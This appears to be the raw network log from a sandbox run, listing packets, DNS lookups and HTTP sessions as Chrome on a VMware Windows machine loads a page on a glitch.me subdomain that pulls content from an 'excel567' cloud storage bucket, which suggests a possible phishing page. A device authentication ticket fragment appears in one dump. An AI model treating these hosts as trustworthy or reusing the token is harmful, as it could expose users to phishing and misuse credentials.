            Sep 29, 2024 04:33:00.643920898 CEST4434974840.113.110.67192.168.2.6
            Sep 29, 2024 04:33:00.644021034 CEST49748443192.168.2.640.113.110.67
            Sep 29, 2024 04:33:00.650151014 CEST49748443192.168.2.640.113.110.67
            Sep 29, 2024 04:33:00.650161028 CEST4434974840.113.110.67192.168.2.6
            Sep 29, 2024 04:33:00.650481939 CEST4434974840.113.110.67192.168.2.6
            Sep 29, 2024 04:33:00.652441978 CEST49748443192.168.2.640.113.110.67
            Sep 29, 2024 04:33:00.652503967 CEST49748443192.168.2.640.113.110.67
            Sep 29, 2024 04:33:00.652508974 CEST4434974840.113.110.67192.168.2.6
            Sep 29, 2024 04:33:00.652640104 CEST49748443192.168.2.640.113.110.67
            Sep 29, 2024 04:33:00.695414066 CEST4434974840.113.110.67192.168.2.6
            Sep 29, 2024 04:33:00.824199915 CEST4434974840.113.110.67192.168.2.6
            Sep 29, 2024 04:33:00.824295998 CEST4434974840.113.110.67192.168.2.6
            Sep 29, 2024 04:33:00.824359894 CEST49748443192.168.2.640.113.110.67
            Sep 29, 2024 04:33:00.824584007 CEST49748443192.168.2.640.113.110.67
            Sep 29, 2024 04:33:00.824603081 CEST4434974840.113.110.67192.168.2.6
            Sep 29, 2024 04:33:12.591873884 CEST44349747173.222.162.64192.168.2.6
            Sep 29, 2024 04:33:12.591963053 CEST49747443192.168.2.6173.222.162.64
            Sep 29, 2024 04:33:21.508985043 CEST49750443192.168.2.640.113.110.67
            Sep 29, 2024 04:33:21.509052992 CEST4434975040.113.110.67192.168.2.6
            Sep 29, 2024 04:33:21.509155989 CEST49750443192.168.2.640.113.110.67
            Sep 29, 2024 04:33:21.529747963 CEST49750443192.168.2.640.113.110.67
            Sep 29, 2024 04:33:21.529766083 CEST4434975040.113.110.67192.168.2.6
            Sep 29, 2024 04:33:22.331163883 CEST4434975040.113.110.67192.168.2.6
            Sep 29, 2024 04:33:22.331248045 CEST49750443192.168.2.640.113.110.67
            Sep 29, 2024 04:33:22.335387945 CEST49750443192.168.2.640.113.110.67
            Sep 29, 2024 04:33:22.335401058 CEST4434975040.113.110.67192.168.2.6
            Sep 29, 2024 04:33:22.335668087 CEST4434975040.113.110.67192.168.2.6
            Sep 29, 2024 04:33:22.338320017 CEST49750443192.168.2.640.113.110.67
            Sep 29, 2024 04:33:22.338535070 CEST49750443192.168.2.640.113.110.67
            Sep 29, 2024 04:33:22.338541031 CEST4434975040.113.110.67192.168.2.6
            Sep 29, 2024 04:33:22.339116096 CEST49750443192.168.2.640.113.110.67
            Sep 29, 2024 04:33:22.383394003 CEST4434975040.113.110.67192.168.2.6
            Sep 29, 2024 04:33:22.517110109 CEST4434975040.113.110.67192.168.2.6
            Sep 29, 2024 04:33:22.517189026 CEST4434975040.113.110.67192.168.2.6
            Sep 29, 2024 04:33:22.517285109 CEST49750443192.168.2.640.113.110.67
            Sep 29, 2024 04:33:22.517699957 CEST49750443192.168.2.640.113.110.67
            Sep 29, 2024 04:33:22.517721891 CEST4434975040.113.110.67192.168.2.6
            Sep 29, 2024 04:33:25.444674969 CEST49717443192.168.2.654.211.144.142
            Sep 29, 2024 04:33:25.444720030 CEST4434971754.211.144.142192.168.2.6
            Sep 29, 2024 04:33:41.762656927 CEST49717443192.168.2.654.211.144.142
            Sep 29, 2024 04:33:41.762834072 CEST4434971754.211.144.142192.168.2.6
            Sep 29, 2024 04:33:41.763073921 CEST49753443192.168.2.6216.58.206.68
            Sep 29, 2024 04:33:41.763101101 CEST49717443192.168.2.654.211.144.142
            Sep 29, 2024 04:33:41.763118982 CEST44349753216.58.206.68192.168.2.6
            Sep 29, 2024 04:33:41.763469934 CEST49753443192.168.2.6216.58.206.68
            Sep 29, 2024 04:33:41.764576912 CEST49753443192.168.2.6216.58.206.68
            Sep 29, 2024 04:33:41.764600992 CEST44349753216.58.206.68192.168.2.6
            Sep 29, 2024 04:33:42.428083897 CEST44349753216.58.206.68192.168.2.6
            Sep 29, 2024 04:33:42.440968990 CEST49753443192.168.2.6216.58.206.68
            Sep 29, 2024 04:33:42.440999985 CEST44349753216.58.206.68192.168.2.6
            Sep 29, 2024 04:33:42.441385984 CEST44349753216.58.206.68192.168.2.6
            Sep 29, 2024 04:33:42.442308903 CEST49753443192.168.2.6216.58.206.68
            Sep 29, 2024 04:33:42.442367077 CEST44349753216.58.206.68192.168.2.6
            Sep 29, 2024 04:33:42.492002010 CEST49753443192.168.2.6216.58.206.68
            Sep 29, 2024 04:33:43.294945955 CEST49754443192.168.2.640.113.110.67
            Sep 29, 2024 04:33:43.295007944 CEST4434975440.113.110.67192.168.2.6
            Sep 29, 2024 04:33:43.295069933 CEST49754443192.168.2.640.113.110.67
            Sep 29, 2024 04:33:43.296133995 CEST49754443192.168.2.640.113.110.67
            Sep 29, 2024 04:33:43.296144962 CEST4434975440.113.110.67192.168.2.6
            Sep 29, 2024 04:33:44.078538895 CEST4434975440.113.110.67192.168.2.6
            Sep 29, 2024 04:33:44.078646898 CEST49754443192.168.2.640.113.110.67
            Sep 29, 2024 04:33:44.080887079 CEST49754443192.168.2.640.113.110.67
            Sep 29, 2024 04:33:44.080904007 CEST4434975440.113.110.67192.168.2.6
            Sep 29, 2024 04:33:44.081209898 CEST4434975440.113.110.67192.168.2.6
            Sep 29, 2024 04:33:44.083168030 CEST49754443192.168.2.640.113.110.67
            Sep 29, 2024 04:33:44.083259106 CEST49754443192.168.2.640.113.110.67
            Sep 29, 2024 04:33:44.083266973 CEST4434975440.113.110.67192.168.2.6
            Sep 29, 2024 04:33:44.083395004 CEST49754443192.168.2.640.113.110.67
            Sep 29, 2024 04:33:44.127405882 CEST4434975440.113.110.67192.168.2.6
            Sep 29, 2024 04:33:44.252929926 CEST4434975440.113.110.67192.168.2.6
            Sep 29, 2024 04:33:44.253022909 CEST4434975440.113.110.67192.168.2.6
            Sep 29, 2024 04:33:44.253083944 CEST49754443192.168.2.640.113.110.67
            Sep 29, 2024 04:33:44.253309965 CEST49754443192.168.2.640.113.110.67
            Sep 29, 2024 04:33:44.253336906 CEST4434975440.113.110.67192.168.2.6
            Sep 29, 2024 04:33:52.334642887 CEST44349753216.58.206.68192.168.2.6
            Sep 29, 2024 04:33:52.334728003 CEST44349753216.58.206.68192.168.2.6
            Sep 29, 2024 04:33:52.334784985 CEST49753443192.168.2.6216.58.206.68
            Sep 29, 2024 04:33:54.026765108 CEST49753443192.168.2.6216.58.206.68
            Sep 29, 2024 04:33:54.026808977 CEST44349753216.58.206.68192.168.2.6
            TimestampSource PortDest PortSource IPDest IP
            Sep 29, 2024 04:32:37.767733097 CEST53561011.1.1.1192.168.2.6
            Sep 29, 2024 04:32:37.795119047 CEST53567141.1.1.1192.168.2.6
            Sep 29, 2024 04:32:38.823409081 CEST53522241.1.1.1192.168.2.6
            Sep 29, 2024 04:32:39.657838106 CEST5090153192.168.2.61.1.1.1
            Sep 29, 2024 04:32:39.657999992 CEST6417453192.168.2.61.1.1.1
            Sep 29, 2024 04:32:39.681931973 CEST53509011.1.1.1192.168.2.6
            Sep 29, 2024 04:32:39.682645082 CEST53641741.1.1.1192.168.2.6
            Sep 29, 2024 04:32:40.645113945 CEST4985053192.168.2.61.1.1.1
            Sep 29, 2024 04:32:40.645488024 CEST6109353192.168.2.61.1.1.1
            Sep 29, 2024 04:32:40.651865959 CEST5120153192.168.2.61.1.1.1
            Sep 29, 2024 04:32:40.652260065 CEST6289553192.168.2.61.1.1.1
            Sep 29, 2024 04:32:40.668989897 CEST53628951.1.1.1192.168.2.6
            Sep 29, 2024 04:32:40.669869900 CEST53512011.1.1.1192.168.2.6
            Sep 29, 2024 04:32:40.765882015 CEST53610931.1.1.1192.168.2.6
            Sep 29, 2024 04:32:40.769539118 CEST53498501.1.1.1192.168.2.6
            Sep 29, 2024 04:32:41.918380976 CEST5048653192.168.2.61.1.1.1
            Sep 29, 2024 04:32:41.918934107 CEST6182453192.168.2.61.1.1.1
            Sep 29, 2024 04:32:41.925177097 CEST53504861.1.1.1192.168.2.6
            Sep 29, 2024 04:32:41.925503969 CEST53618241.1.1.1192.168.2.6
            Sep 29, 2024 04:32:42.464004040 CEST5291053192.168.2.61.1.1.1
            Sep 29, 2024 04:32:42.464004040 CEST6115953192.168.2.61.1.1.1
            Sep 29, 2024 04:32:42.480880976 CEST53529101.1.1.1192.168.2.6
            Sep 29, 2024 04:32:42.488401890 CEST53611591.1.1.1192.168.2.6
            Sep 29, 2024 04:32:42.838993073 CEST5505053192.168.2.61.1.1.1
            Sep 29, 2024 04:32:42.839211941 CEST5865453192.168.2.61.1.1.1
            Sep 29, 2024 04:32:42.840465069 CEST5246153192.168.2.61.1.1.1
            Sep 29, 2024 04:32:42.840698004 CEST5796253192.168.2.61.1.1.1
            Sep 29, 2024 04:32:42.841414928 CEST6205553192.168.2.61.1.1.1
            Sep 29, 2024 04:32:42.842077971 CEST5969753192.168.2.61.1.1.1
            Sep 29, 2024 04:32:42.843713045 CEST5217253192.168.2.61.1.1.1
            Sep 29, 2024 04:32:42.844227076 CEST5179053192.168.2.61.1.1.1
            Sep 29, 2024 04:32:42.845668077 CEST53586541.1.1.1192.168.2.6
            Sep 29, 2024 04:32:42.845684052 CEST53550501.1.1.1192.168.2.6
            Sep 29, 2024 04:32:42.847423077 CEST53579621.1.1.1192.168.2.6
            Sep 29, 2024 04:32:42.847507954 CEST53524611.1.1.1192.168.2.6
            Sep 29, 2024 04:32:42.848054886 CEST53620551.1.1.1192.168.2.6
            Sep 29, 2024 04:32:42.848896980 CEST53596971.1.1.1192.168.2.6
            Sep 29, 2024 04:32:42.849770069 CEST53622881.1.1.1192.168.2.6
            Sep 29, 2024 04:32:42.850959063 CEST53521721.1.1.1192.168.2.6
            Sep 29, 2024 04:32:42.852814913 CEST53517901.1.1.1192.168.2.6
            Sep 29, 2024 04:32:43.665862083 CEST5986153192.168.2.61.1.1.1
            Sep 29, 2024 04:32:43.666806936 CEST5811653192.168.2.61.1.1.1
            Sep 29, 2024 04:32:43.667490005 CEST5985653192.168.2.61.1.1.1
            Sep 29, 2024 04:32:43.668026924 CEST5657153192.168.2.61.1.1.1
            Sep 29, 2024 04:32:43.668909073 CEST6490653192.168.2.61.1.1.1
            Sep 29, 2024 04:32:43.669348001 CEST5656953192.168.2.61.1.1.1
            Sep 29, 2024 04:32:43.671135902 CEST6204653192.168.2.61.1.1.1
            Sep 29, 2024 04:32:43.671837091 CEST6180253192.168.2.61.1.1.1
            Sep 29, 2024 04:32:43.672394037 CEST53598611.1.1.1192.168.2.6
            Sep 29, 2024 04:32:43.673876047 CEST53581161.1.1.1192.168.2.6
            Sep 29, 2024 04:32:43.674559116 CEST53598561.1.1.1192.168.2.6
            Sep 29, 2024 04:32:43.675102949 CEST53565711.1.1.1192.168.2.6
            Sep 29, 2024 04:32:43.675507069 CEST53649061.1.1.1192.168.2.6
            Sep 29, 2024 04:32:43.676398039 CEST53565691.1.1.1192.168.2.6
            Sep 29, 2024 04:32:43.677653074 CEST53620461.1.1.1192.168.2.6
            Sep 29, 2024 04:32:43.678824902 CEST53618021.1.1.1192.168.2.6
            Sep 29, 2024 04:32:44.455081940 CEST53498321.1.1.1192.168.2.6
            Sep 29, 2024 04:32:44.752094030 CEST5716053192.168.2.61.1.1.1
            Sep 29, 2024 04:32:44.752490997 CEST5666453192.168.2.61.1.1.1
            Sep 29, 2024 04:32:44.761492014 CEST53588831.1.1.1192.168.2.6
            Sep 29, 2024 04:32:44.773025990 CEST53566641.1.1.1192.168.2.6
            Sep 29, 2024 04:32:44.774420023 CEST53571601.1.1.1192.168.2.6
            Sep 29, 2024 04:32:55.947402000 CEST53568501.1.1.1192.168.2.6
            Sep 29, 2024 04:33:14.906941891 CEST53598461.1.1.1192.168.2.6
            Sep 29, 2024 04:33:37.265536070 CEST53542751.1.1.1192.168.2.6
            Sep 29, 2024 04:33:37.607429981 CEST53616571.1.1.1192.168.2.6
            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
            Sep 29, 2024 04:32:39.657838106 CEST192.168.2.61.1.1.10x24e8Standard query (0)certain-jeweled-verse.glitch.meA (IP address)IN (0x0001)false
            Sep 29, 2024 04:32:39.657999992 CEST192.168.2.61.1.1.10xbfefStandard query (0)certain-jeweled-verse.glitch.me65IN (0x0001)false
            Sep 29, 2024 04:32:40.645113945 CEST192.168.2.61.1.1.10x436dStandard query (0)excel567.oss-ap-southeast-3.aliyuncs.comA (IP address)IN (0x0001)false
            Sep 29, 2024 04:32:40.645488024 CEST192.168.2.61.1.1.10x95baStandard query (0)excel567.oss-ap-southeast-3.aliyuncs.com65IN (0x0001)false
            Sep 29, 2024 04:32:40.651865959 CEST192.168.2.61.1.1.10x48d6Standard query (0)cdn.glitch.comA (IP address)IN (0x0001)false
            Sep 29, 2024 04:32:40.652260065 CEST192.168.2.61.1.1.10x3edcStandard query (0)cdn.glitch.com65IN (0x0001)false
            Sep 29, 2024 04:32:41.918380976 CEST192.168.2.61.1.1.10xbdf3Standard query (0)www.google.comA (IP address)IN (0x0001)false
            Sep 29, 2024 04:32:41.918934107 CEST192.168.2.61.1.1.10x405eStandard query (0)www.google.com65IN (0x0001)false
            Sep 29, 2024 04:32:42.464004040 CEST192.168.2.61.1.1.10x816aStandard query (0)cdn.glitch.me65IN (0x0001)false
            Sep 29, 2024 04:32:42.464004040 CEST192.168.2.61.1.1.10xf7deStandard query (0)cdn.glitch.meA (IP address)IN (0x0001)false
            Sep 29, 2024 04:32:42.838993073 CEST192.168.2.61.1.1.10xfa5dStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
            Sep 29, 2024 04:32:42.839211941 CEST192.168.2.61.1.1.10xb857Standard query (0)code.jquery.com65IN (0x0001)false
            Sep 29, 2024 04:32:42.840465069 CEST192.168.2.61.1.1.10xc8ceStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
            Sep 29, 2024 04:32:42.840698004 CEST192.168.2.61.1.1.10x8ac1Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
            Sep 29, 2024 04:32:42.841414928 CEST192.168.2.61.1.1.10xb064Standard query (0)maxcdn.bootstrapcdn.comA (IP address)IN (0x0001)false
            Sep 29, 2024 04:32:42.842077971 CEST192.168.2.61.1.1.10xd3edStandard query (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
            Sep 29, 2024 04:32:42.843713045 CEST192.168.2.61.1.1.10xdd77Standard query (0)stackpath.bootstrapcdn.comA (IP address)IN (0x0001)false
            Sep 29, 2024 04:32:42.844227076 CEST192.168.2.61.1.1.10x2b1eStandard query (0)stackpath.bootstrapcdn.com65IN (0x0001)false
            Sep 29, 2024 04:32:43.665862083 CEST192.168.2.61.1.1.10x9734Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
            Sep 29, 2024 04:32:43.666806936 CEST192.168.2.61.1.1.10xe31aStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
            Sep 29, 2024 04:32:43.667490005 CEST192.168.2.61.1.1.10x7fdaStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
            Sep 29, 2024 04:32:43.668026924 CEST192.168.2.61.1.1.10xefdStandard query (0)code.jquery.com65IN (0x0001)false
            Sep 29, 2024 04:32:43.668909073 CEST192.168.2.61.1.1.10xb765Standard query (0)maxcdn.bootstrapcdn.comA (IP address)IN (0x0001)false
            Sep 29, 2024 04:32:43.669348001 CEST192.168.2.61.1.1.10x73f1Standard query (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
            Sep 29, 2024 04:32:43.671135902 CEST192.168.2.61.1.1.10x7cd6Standard query (0)stackpath.bootstrapcdn.comA (IP address)IN (0x0001)false
            Sep 29, 2024 04:32:43.671837091 CEST192.168.2.61.1.1.10xee9bStandard query (0)stackpath.bootstrapcdn.com65IN (0x0001)false
            Sep 29, 2024 04:32:44.752094030 CEST192.168.2.61.1.1.10xac2bStandard query (0)cdn.glitch.meA (IP address)IN (0x0001)false
            Sep 29, 2024 04:32:44.752490997 CEST192.168.2.61.1.1.10xf844Standard query (0)cdn.glitch.me65IN (0x0001)false
            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
            Sep 29, 2024 04:32:39.681931973 CEST1.1.1.1192.168.2.60x24e8No error (0)certain-jeweled-verse.glitch.me54.211.144.142A (IP address)IN (0x0001)false
            Sep 29, 2024 04:32:39.681931973 CEST1.1.1.1192.168.2.60x24e8No error (0)certain-jeweled-verse.glitch.me54.81.34.32A (IP address)IN (0x0001)false
            Sep 29, 2024 04:32:40.669869900 CEST1.1.1.1192.168.2.60x48d6No error (0)cdn.glitch.com18.173.205.20A (IP address)IN (0x0001)false
            Sep 29, 2024 04:32:40.669869900 CEST1.1.1.1192.168.2.60x48d6No error (0)cdn.glitch.com18.173.205.88A (IP address)IN (0x0001)false
            Sep 29, 2024 04:32:40.669869900 CEST1.1.1.1192.168.2.60x48d6No error (0)cdn.glitch.com18.173.205.54A (IP address)IN (0x0001)false
            Sep 29, 2024 04:32:40.669869900 CEST1.1.1.1192.168.2.60x48d6No error (0)cdn.glitch.com18.173.205.77A (IP address)IN (0x0001)false
            Sep 29, 2024 04:32:40.769539118 CEST1.1.1.1192.168.2.60x436dNo error (0)excel567.oss-ap-southeast-3.aliyuncs.com47.254.218.78A (IP address)IN (0x0001)false
            Sep 29, 2024 04:32:41.925177097 CEST1.1.1.1192.168.2.60xbdf3No error (0)www.google.com216.58.206.68A (IP address)IN (0x0001)false
            Sep 29, 2024 04:32:41.925503969 CEST1.1.1.1192.168.2.60x405eNo error (0)www.google.com65IN (0x0001)false
            Sep 29, 2024 04:32:42.488401890 CEST1.1.1.1192.168.2.60xf7deNo error (0)cdn.glitch.me65.9.95.85A (IP address)IN (0x0001)false
            Sep 29, 2024 04:32:42.488401890 CEST1.1.1.1192.168.2.60xf7deNo error (0)cdn.glitch.me65.9.95.77A (IP address)IN (0x0001)false
            Sep 29, 2024 04:32:42.488401890 CEST1.1.1.1192.168.2.60xf7deNo error (0)cdn.glitch.me65.9.95.99A (IP address)IN (0x0001)false
            Sep 29, 2024 04:32:42.488401890 CEST1.1.1.1192.168.2.60xf7deNo error (0)cdn.glitch.me65.9.95.2A (IP address)IN (0x0001)false
            Sep 29, 2024 04:32:42.845684052 CEST1.1.1.1192.168.2.60xfa5dNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
            Sep 29, 2024 04:32:42.845684052 CEST1.1.1.1192.168.2.60xfa5dNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
            Sep 29, 2024 04:32:42.845684052 CEST1.1.1.1192.168.2.60xfa5dNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
            Sep 29, 2024 04:32:42.845684052 CEST1.1.1.1192.168.2.60xfa5dNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
            Sep 29, 2024 04:32:42.847423077 CEST1.1.1.1192.168.2.60x8ac1No error (0)cdnjs.cloudflare.com65IN (0x0001)false
            Sep 29, 2024 04:32:42.847507954 CEST1.1.1.1192.168.2.60xc8ceNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
            Sep 29, 2024 04:32:42.847507954 CEST1.1.1.1192.168.2.60xc8ceNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
            Sep 29, 2024 04:32:42.848054886 CEST1.1.1.1192.168.2.60xb064No error (0)maxcdn.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)false
            Sep 29, 2024 04:32:42.848054886 CEST1.1.1.1192.168.2.60xb064No error (0)maxcdn.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)false
            Sep 29, 2024 04:32:42.848896980 CEST1.1.1.1192.168.2.60xd3edNo error (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
            Sep 29, 2024 04:32:42.850959063 CEST1.1.1.1192.168.2.60xdd77No error (0)stackpath.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)false
            Sep 29, 2024 04:32:42.850959063 CEST1.1.1.1192.168.2.60xdd77No error (0)stackpath.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)false
            Sep 29, 2024 04:32:42.852814913 CEST1.1.1.1192.168.2.60x2b1eNo error (0)stackpath.bootstrapcdn.com65IN (0x0001)false
            Sep 29, 2024 04:32:43.672394037 CEST1.1.1.1192.168.2.60x9734No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
            Sep 29, 2024 04:32:43.672394037 CEST1.1.1.1192.168.2.60x9734No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
            Sep 29, 2024 04:32:43.673876047 CEST1.1.1.1192.168.2.60xe31aNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
            Sep 29, 2024 04:32:43.674559116 CEST1.1.1.1192.168.2.60x7fdaNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
            Sep 29, 2024 04:32:43.674559116 CEST1.1.1.1192.168.2.60x7fdaNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
            Sep 29, 2024 04:32:43.674559116 CEST1.1.1.1192.168.2.60x7fdaNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
            Sep 29, 2024 04:32:43.674559116 CEST1.1.1.1192.168.2.60x7fdaNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
            Sep 29, 2024 04:32:43.675507069 CEST1.1.1.1192.168.2.60xb765No error (0)maxcdn.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)false
            Sep 29, 2024 04:32:43.675507069 CEST1.1.1.1192.168.2.60xb765No error (0)maxcdn.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)false
            Sep 29, 2024 04:32:43.676398039 CEST1.1.1.1192.168.2.60x73f1No error (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
            Sep 29, 2024 04:32:43.677653074 CEST1.1.1.1192.168.2.60x7cd6No error (0)stackpath.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)false
            Sep 29, 2024 04:32:43.677653074 CEST1.1.1.1192.168.2.60x7cd6No error (0)stackpath.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)false
            Sep 29, 2024 04:32:43.678824902 CEST1.1.1.1192.168.2.60xee9bNo error (0)stackpath.bootstrapcdn.com65IN (0x0001)false
            Sep 29, 2024 04:32:44.774420023 CEST1.1.1.1192.168.2.60xac2bNo error (0)cdn.glitch.me65.9.95.85A (IP address)IN (0x0001)false
            Sep 29, 2024 04:32:44.774420023 CEST1.1.1.1192.168.2.60xac2bNo error (0)cdn.glitch.me65.9.95.99A (IP address)IN (0x0001)false
            Sep 29, 2024 04:32:44.774420023 CEST1.1.1.1192.168.2.60xac2bNo error (0)cdn.glitch.me65.9.95.2A (IP address)IN (0x0001)false
            Sep 29, 2024 04:32:44.774420023 CEST1.1.1.1192.168.2.60xac2bNo error (0)cdn.glitch.me65.9.95.77A (IP address)IN (0x0001)false
            Sep 29, 2024 04:32:50.980778933 CEST1.1.1.1192.168.2.60xaf24No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
            Sep 29, 2024 04:32:50.980778933 CEST1.1.1.1192.168.2.60xaf24No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
            • certain-jeweled-verse.glitch.me
            • https:
              • cdn.glitch.com
              • excel567.oss-ap-southeast-3.aliyuncs.com
              • cdn.glitch.me
              • maxcdn.bootstrapcdn.com
              • stackpath.bootstrapcdn.com
              • code.jquery.com
              • cdnjs.cloudflare.com
            • fs.microsoft.com
            Session IDSource IPSource PortDestination IPDestination Port
            0192.168.2.64971340.113.110.67443
            TimestampBytes transferredDirectionData
            2024-09-29 02:32:38 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 6c 70 6f 44 72 74 39 33 43 55 57 76 71 39 43 6c 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 34 36 32 64 61 35 63 62 61 30 32 65 30 62 64 0d 0a 0d 0a
            Data Ascii: CNT 1 CON 305MS-CV: lpoDrt93CUWvq9Cl.1Context: e462da5cba02e0bd
            2024-09-29 02:32:38 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
            2024-09-29 02:32:38 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 6c 70 6f 44 72 74 39 33 43 55 57 76 71 39 43 6c 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 34 36 32 64 61 35 63 62 61 30 32 65 30 62 64 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 55 51 77 45 77 70 55 58 6e 4a 75 4a 48 61 46 43 46 64 44 4b 71 72 74 7a 61 37 68 65 33 74 46 5a 6a 78 64 61 38 61 2f 46 5a 42 30 2f 2b 50 41 63 47 63 77 4f 45 71 67 4b 6a 49 56 4d 61 57 6a 50 6e 63 65 6e 66 53 72 73 72 46 72 54 51 55 56 71 76 79 70 43 42 6a 35 53 75 4f 62 37 68 4b 36 70 68 70 37 55 58 78 38 37 64 35 6e 67 51
            Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: lpoDrt93CUWvq9Cl.2Context: e462da5cba02e0bd<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAUQwEwpUXnJuJHaFCFdDKqrtza7he3tFZjxda8a/FZB0/+PAcGcwOEqgKjIVMaWjPncenfSrsrFrTQUVqvypCBj5SuOb7hK6php7UXx87d5ngQ
            2024-09-29 02:32:38 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 6c 70 6f 44 72 74 39 33 43 55 57 76 71 39 43 6c 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 34 36 32 64 61 35 63 62 61 30 32 65 30 62 64 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
            Data Ascii: BND 3 CON\WNS 0 197MS-CV: lpoDrt93CUWvq9Cl.3Context: e462da5cba02e0bd<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
            2024-09-29 02:32:38 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
            Data Ascii: 202 1 CON 58
            2024-09-29 02:32:38 UTC58INData Raw: 4d 53 2d 43 56 3a 20 4f 4d 61 76 6b 56 30 31 58 55 4f 6b 55 35 6c 42 6e 42 4a 45 4e 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
            Data Ascii: MS-CV: OMavkV01XUOkU5lBnBJENA.0Payload parsing failed.


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            1192.168.2.64971654.211.144.1424433576C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-29 02:32:40 UTC684OUTGET /newson.htm HTTP/1.1
            Host: certain-jeweled-verse.glitch.me
            Connection: keep-alive
